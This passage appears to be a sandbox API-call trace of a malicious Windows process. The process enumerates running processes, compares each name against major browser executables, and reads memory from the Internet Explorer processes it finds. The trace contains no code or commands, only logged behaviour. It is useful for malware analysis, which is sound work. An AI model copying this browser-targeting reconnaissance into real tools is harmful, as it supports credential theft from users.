	[0230.331] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0230.332] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6768
	[0230.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.332] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0230.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.332] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.332] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0230.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.333] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.333] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0230.334] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x676c
	[0230.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.334] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0230.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.334] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.334] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0230.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.335] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.335] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0230.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6770
	[0230.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.336] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0230.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.336] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.337] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0230.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.337] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.337] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0230.338] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0230.338] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0230.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6774
	[0230.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.340] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0230.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.340] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.341] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0230.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.342] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.343] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0230.344] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6778
	[0230.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.344] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0230.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.344] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.345] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0230.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.345] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.345] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0230.346] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x677c
	[0230.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.346] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0230.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.347] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.347] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0230.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.347] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.348] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0230.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6780
	[0230.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.348] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0230.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.349] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.349] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0230.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.349] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.350] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0230.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6784
	[0230.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.351] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0230.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.351] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.352] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0230.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.352] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.353] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0230.354] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6788
	[0230.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.354] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0230.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.354] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.354] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0230.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.355] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.355] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0230.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x678c
	[0230.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.356] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0230.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.356] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.356] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0230.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.357] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.357] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0230.358] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6790
	[0230.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.358] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0230.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.359] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.359] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0230.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.359] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.360] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0230.360] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6794
	[0230.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.361] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0230.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.361] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.361] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0230.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.361] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.362] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0230.362] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6798
	[0230.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.363] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0230.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.363] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.363] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0230.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.363] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.364] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0230.364] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x679c
	[0230.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.365] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0230.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.365] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.365] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0230.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.366] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.367] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0230.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x67a0
	[0230.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.367] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0230.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.368] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.369] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0230.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.369] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.370] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0230.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x67a4
	[0230.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.371] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0230.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.371] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.372] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0230.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.372] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.372] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0230.373] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x67a8
	[0230.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.373] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0230.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.374] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.374] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0230.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.375] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.376] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0230.376] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x67ac
	[0230.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.376] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0230.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.377] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.377] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0230.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.378] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.378] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0230.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x67b0
	[0230.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.379] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0230.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.379] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0230.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.380] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0230.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.380] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.380] NtQueryInformationProcess (in: ProcessHandle=0x67b0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0230.380] ReadProcessMemory (in: hProcess=0x67b0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0230.380] ReadProcessMemory (in: hProcess=0x67b0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0230.381] ReadProcessMemory (in: hProcess=0x67b0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0230.381] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0230.381] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0230.382] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x67b4
	[0230.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.382] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0230.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.383] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0230.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.383] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0230.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.383] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.384] NtQueryInformationProcess (in: ProcessHandle=0x67b4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0230.384] ReadProcessMemory (in: hProcess=0x67b4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0230.384] ReadProcessMemory (in: hProcess=0x67b4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0230.384] ReadProcessMemory (in: hProcess=0x67b4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0230.384] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0230.384] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0230.385] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x67b8
	[0230.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.385] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0230.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.386] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.386] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0230.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.386] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.386] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0230.387] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x67bc
	[0230.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.387] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0230.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.388] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.388] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0230.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.388] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.389] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
